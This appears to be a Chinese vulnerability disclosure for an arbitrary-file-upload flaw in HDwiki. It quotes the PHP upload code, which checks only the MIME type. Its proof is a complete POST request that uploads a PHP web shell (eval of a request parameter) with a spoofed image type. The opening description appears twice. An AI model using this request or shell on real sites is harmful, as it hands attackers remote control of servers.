### 简要描述: 互动维客开源系统(HDwiki)作为中国第一家拥有自主知识产权的中文维基(Wiki)系统,由互动在线(北京)科技有限公司于2006 年11月28日正式推出,力争为给国内外众多的维基(Wiki)爱好者提供一个免费、易用、功能强大的维基(Wiki)建站系统。HDwiki的推出,填补了中文维基(Wiki)建站系统的空白 但是HDwiki中某些上传功能存在安全漏洞,通过一些数据即可绕过上传限制,最终控制远程站点 ### 详细说明: lib/file.class.php中 ``` function uploadfile($attachment,$target,$maxsize=1024,$is_image=1){ $result=array ('result'=>false,'msg'=>'upload mistake'); if($is_image){ $attach=$attachment; $filesize=$attach['size']/1024; if(0==$filesize){ $result['msg'] = '上传错误'; return $result; } if(substr($attach['type'],0,6)!='image/'){ $result['msg'] ='格式错误'; return $result; } if($filesize>$maxsize){ $result['msg'] ='文件过大'; return $result; } }else{ $attach['tmp_name']=$attachment; } $filedir=dirname($target); file::forcemkdir($filedir); if(@copy($attach['tmp_name'],$target) || @move_uploaded_file($attach['tmp_name'],$target)){ ``` 没有什么检查 attachment.php里触发 ``` function douploadimg() {...
### 简要描述: 互动维客开源系统(HDwiki)作为中国第一家拥有自主知识产权的中文维基(Wiki)系统,由互动在线(北京)科技有限公司于2006 年11月28日正式推出,力争为给国内外众多的维基(Wiki)爱好者提供一个免费、易用、功能强大的维基(Wiki)建站系统。HDwiki的推出,填补了中文维基(Wiki)建站系统的空白 但是HDwiki中某些上传功能存在安全漏洞,通过一些数据即可绕过上传限制,最终控制远程站点 ### 详细说明: lib/file.class.php中 ``` function uploadfile($attachment,$target,$maxsize=1024,$is_image=1){ $result=array ('result'=>false,'msg'=>'upload mistake'); if($is_image){ $attach=$attachment; $filesize=$attach['size']/1024; if(0==$filesize){ $result['msg'] = '上传错误'; return $result; } if(substr($attach['type'],0,6)!='image/'){ $result['msg'] ='格式错误'; return $result; } if($filesize>$maxsize){ $result['msg'] ='文件过大'; return $result; } }else{ $attach['tmp_name']=$attachment; } $filedir=dirname($target); file::forcemkdir($filedir); if(@copy($attach['tmp_name'],$target) || @move_uploaded_file($attach['tmp_name'],$target)){ ``` 没有什么检查 attachment.php里触发 ``` function douploadimg() { $imgname=$_FILES['photofile']['name']; $extname=file::extname($imgname); $destfile=$_ENV['attachment']->makepath($extname); $arrupload=file::uploadfile($_FILES['photofile'],$destfile); ``` ### 漏洞证明: ``` POST /hdwiki/index.php?attachment-uploadimg HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.wooyun.org/ Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7db261e100f2e User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2) Host: www.wooyun.org Content-Length: 370 Connection: Keep-Alive Cache-Control: no-cache Cookie: Hm_lvt_c12f88b5c1cd041a732dea597a5ec94c=1298002704449; hd_sid=raG13H; hd_auth=4113YBBXXB13XtdR6EXTA1Cb9BuhZMK%2F29wdoHDQJTV5QZOoYd62OHd46iXKqf4Qz%2F5gc6pLm9fZ%2Bdgv68MT; hd_searchtime=1300983373 -----------------------------7db261e100f2e Content-Disposition: form-data; name="MAX_FILE_SIZE" 30000 -----------------------------7db261e100f2e Content-Disposition: form-data; name="photofile"; filename="C:\fucker\z.php" Content-Type: image/image zzz<?eval($_REQUEST[z])?> -----------------------------7db261e100f2e-- ```
